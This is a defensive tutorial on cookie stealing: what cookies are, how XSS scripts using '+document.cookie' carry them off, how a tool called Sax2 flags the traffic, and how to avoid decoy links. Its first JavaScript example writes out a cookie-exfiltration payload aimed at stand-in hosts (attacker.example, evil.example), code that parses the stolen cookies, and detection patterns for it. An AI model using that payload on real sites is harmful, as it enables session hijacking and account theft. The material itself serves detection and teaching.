How to Detect and Prevent Cookie Stealing


What is a cookie?


A cookie (also called a tracking cookie, browser cookie, or HTTP cookie) is a small piece of text stored on a user's computer by a web browser. A cookie consists of one or more name-value pairs, each carrying a small piece of information.
Cookies can be used for authentication, session tracking (state maintenance), storing site preferences or shopping cart contents, holding the identifier for a server-side session, or anything else that can be accomplished by storing textual data.


Cookie Stealing and the Damage It Does


Cookie stealing means an attacker obtains a user's cookies without authorization. Because cookies record a user's dealings with the sites they visit, a stolen cookie can disclose sensitive information such as:
    Information about visited websites
    Information about the server side of a site (for example, a session identifier)
    Information about BBS (forum) user accounts
    Information about website administrator accounts
    Information about game accounts
    Information about online banking accounts
         ……
Where the stolen cookie is an authentication or session cookie, the attacker can present it to the site and be treated as the user without ever knowing the password.


Methods of Cookie Stealing


At present there are two ways a stolen cookie is carried off: automatic transfer by script, and email. According to incomplete statistics, more than 90 percent of cookie stealing uses automatic script transfer, in which a script running in the victim's browser (commonly injected through a cross-site scripting flaw) reads the cookie and sends it to a location the attacker specifies. Such scripts characteristically contain the code fragment "+document.cookie", which appends the browser's cookie string to a URL the attacker controls.


How to Detect Cookie Stealing with Sax2


1) Run Sax2 and start detection.
2) If cookie stealing activity occurs on the network, Sax2 raises the event HTTP_Suspected cookie stealing. See Figure 1.

(Figure 1: Sax2 real-time alarm on encountering cookie stealing)

In the figure above, Sax2 has detected a host (IP 192.168.1.100) transferring its cookie information to the Internet address 61.xx.xxx.3. The "Original Communication" tab shows the code "+document.cookie" in the original message.
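The following is an added example, not code from the original article and not Sax2's own detection logic. It ties together the two points above: the "+document.cookie" script transfer described under Methods of Cookie Stealing, and the kind of signature check that produces the HTTP_Suspected cookie stealing event. The collector host attacker.example, the cookie values and the captured packets are all constructed for illustration.

```javascript
// Added example (not from the original article, not Sax2 code). The hosts
// attacker.example / evil.example, the cookie values and the captured
// packets below are constructed for illustration.

// 1. The "script automatic transfer" payload. Its distinctive feature is
//    the "+document.cookie" fragment: the browser's cookie string is
//    appended to a URL the attacker controls and the browser is made to
//    request it (here through an image beacon).
const INJECTED_SCRIPT =
  "new Image().src = 'http://attacker.example/c.php?c=' + document.cookie;";

// 2. Run the payload in a stub "browser" so the outgoing request can be
//    inspected without a real browser or network. Only document.cookie and
//    an Image whose .src setter records the URL are provided to the script.
function simulateVictim(cookieString, script) {
  const requests = [];
  const fakeDocument = { cookie: cookieString };
  function FakeImage() {
    Object.defineProperty(this, 'src', { set(url) { requests.push(url); } });
  }
  // Function() evaluates the untrusted script text, just as the victim's
  // browser would; the stubs above are all it can reach.
  new Function('document', 'Image', script)(fakeDocument, FakeImage);
  return requests;
}

// 3. What the collector recovers from the request: the cookie jar, name by name.
function parseStolenCookies(requestUrl) {
  const raw = new URL(requestUrl).searchParams.get('c') || '';
  const jar = {};
  for (const pair of raw.split(';')) {
    const eq = pair.indexOf('=');
    if (eq < 0) continue;
    jar[pair.slice(0, eq).trim()] = pair.slice(eq + 1).trim();
  }
  return jar;
}

// 4. Detection in the spirit of the Sax2 event: scan captured HTTP payloads
//    for document.cookie being concatenated onto a string. A plain read of
//    document.cookie (no "+") is not flagged. When a URL literal precedes
//    the "+", its host is reported as the collector the cookie is sent to.
const EXFIL_MARKER = /\+\s*document\.cookie/i;
const EXFIL_TARGET = /(['"])(https?:\/\/[^'"]+)\1\s*\+\s*document\.cookie/i;

function detectCookieStealing(packets) {
  const alerts = [];
  for (const p of packets) {
    if (!EXFIL_MARKER.test(p.payload)) continue;
    const m = EXFIL_TARGET.exec(p.payload);
    alerts.push({
      event: 'HTTP_Suspected cookie stealing',
      source: p.src,
      destination: p.dst,
      collector: m ? new URL(m[2]).host : null,
    });
  }
  return alerts;
}

// Constructed traffic: a response that reads document.cookie legitimately
// (no alert), a request posting the stealer script, and a response that
// serves a variant with a space after the "+".
const CAPTURED_PACKETS = [
  { src: '203.0.113.10', dst: '192.168.1.100',
    payload: 'HTTP/1.1 200 OK\r\n\r\n<script>var t = document.cookie.indexOf("theme=");</script>' },
  { src: '192.168.1.100', dst: '203.0.113.20',
    payload: 'POST /post.php HTTP/1.1\r\n\r\nbody=<script>' + INJECTED_SCRIPT + '</script>' },
  { src: '203.0.113.30', dst: '192.168.1.100',
    payload: 'HTTP/1.1 200 OK\r\n\r\n<script>location="http://evil.example/?"+ document.cookie</script>' },
];

function demo() {
  const [request] = simulateVictim('PHPSESSID=abc123; user=alice', INJECTED_SCRIPT);
  console.log('victim browser requested:', request);
  console.log('collector recovered:', parseStolenCookies(request));
  console.log('alerts:', detectCookieStealing(CAPTURED_PACKETS));
}
demo();
```

Run it with node. Note that the detector keys on the concatenation, not on the mere presence of document.cookie, which is also read by legitimate page scripts; a stealer that encodes or splits the string differently would need an additional signature.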


How to Prevent Cookie Stealing


1. The easiest way to stop someone stealing your cookies is to watch the links you click. Check the URL the link is about to take you to; if you don't recognize it, don't trust it. Pay particular attention to the structure of the URL. Cookie-stealing pages are typically run from a free subdomain, and to disguise the link the attacker makes it resemble the address of the site on which the malicious link is posted. For example, a cookie stealer placed on Myspace would most likely use a subdomain that looks something like www.myspace.freehost.com. At a glance you see "myspace" and assume everything is fine, but the site actually serving the page is freehost.com. It is very important to watch for this.

2. The only other measure you really need is to clear your cookies at the end of every session. If a Trojan ever infects your computer, you most likely have a backdoor on it that you are not even aware of, which gives attackers free entry. All they need to do, once in, is copy every file in your cookie folder to their own machine and start cracking. If you make a habit of deleting your cookies at the close of every session, however, there is nothing for the attacker to steal (as far as cookies go, that is). Note that this does not help against the script transfer described above, which sends the cookie while the session is still live; against that, the site itself can mark its cookies HttpOnly so that document.cookie cannot read them.
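The URL check described in point 1, as an added example that is not part of the original article. It assumes every site involved has a plain two-label registrable domain (myspace.com, freehost.com); a production check would consult the Public Suffix List so that names like example.co.uk are handled correctly. The sample links are constructed.

```javascript
// Added example (not from the original article). Assumption: registrable
// domains are the last two labels of the host name; real code would use
// the Public Suffix List instead of this simplification.
function registrableDomain(hostname) {
  const labels = hostname.toLowerCase().replace(/\.$/, '').split('.');
  return labels.slice(-2).join('.');
}

// Decide whether a link that looks as if it belongs to trustedDomain really
// goes there. URL.hostname already discards "user@" prefixes and ports, so
// tricks like http://www.myspace.com@freehost.example/ resolve correctly.
function checkLink(href, trustedDomain) {
  let url;
  try {
    url = new URL(href);
  } catch (e) {
    return { ok: false, actual: null, reason: 'not a valid absolute URL' };
  }
  const expected = trustedDomain.toLowerCase();
  const actual = registrableDomain(url.hostname);
  if (actual === expected) {
    return { ok: true, actual, reason: 'registrable domain matches' };
  }
  // The article's case: the brand name appears, but only as a label under
  // someone else's domain (www.myspace.freehost.com).
  const brand = expected.split('.')[0];
  const decoy = url.hostname.toLowerCase().split('.').some((l) => l.includes(brand));
  return {
    ok: false,
    actual,
    reason: decoy
      ? `"${brand}" appears in the host name but the site is really ${actual}`
      : `link goes to ${actual}, not ${expected}`,
  };
}

function checkLinks(hrefs, trustedDomain) {
  return hrefs.map((href) => ({ href, ...checkLink(href, trustedDomain) }));
}

// Constructed links to try against the trusted site myspace.com.
const SAMPLE_LINKS = [
  'https://www.myspace.com/profile',           // genuine
  'http://www.myspace.freehost.com/login',     // the article's decoy subdomain
  'http://myspace.com.evil.example/',          // brand used as a prefix label
  'http://www.myspace.com@freehost.example/',  // userinfo in front of the real host
  'not a url at all',
];

for (const r of checkLinks(SAMPLE_LINKS, 'myspace.com')) {
  console.log(r.ok ? 'OK  ' : 'WARN', r.href, '->', r.reason);
}
```

Only the first link passes; the other four resolve to a different registrable domain even though three of them contain the string "myspace".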